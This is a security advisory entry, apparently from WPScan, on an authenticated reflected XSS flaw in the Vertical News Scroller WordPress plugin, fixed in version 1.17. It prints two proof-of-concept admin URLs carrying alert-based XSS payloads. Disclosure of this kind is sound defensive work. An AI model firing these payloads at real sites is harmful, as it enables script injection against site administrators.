How it works Pricing

Vulnerabilities

WordPress Plugins Themes Stats Submit vulnerabilities

For developers

Status API details CLI scanner

WordPress Plugin Vulnerabilities

Vertical News Scroller < 1.17 - Authenticated Reflected Cross-Site Scripting (XSS)

Description

The plugin attempted to fix a reflected Cross-Site Scripting in v1.10, however the changes were insufficient, as sanitize_text_field() was used, but output in an attribute without being escaped.

Proof of Concept

For versions < 1.17: /wp-admin/admin.php?page=Scrollnews-settings&search_term=aa%22+autofocus+onfocus%3Dalert%28%2FXSS%2F%29+b%3D

For versions < 1.10: /wp-admin/admin.php?page=Scrollnews-settings&action=addedit&id=1%22%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3E

Affects Plugins

vertical-news-scroller

Fixed in version 1.17

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

70d10e3c-a905-45a3-996e-fc99544aeae5

Timeline

Publicly Published

2021-03-26 (about 2 years ago)

Added

2021-03-26 (about 2 years ago)

Last Updated

2021-03-26 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin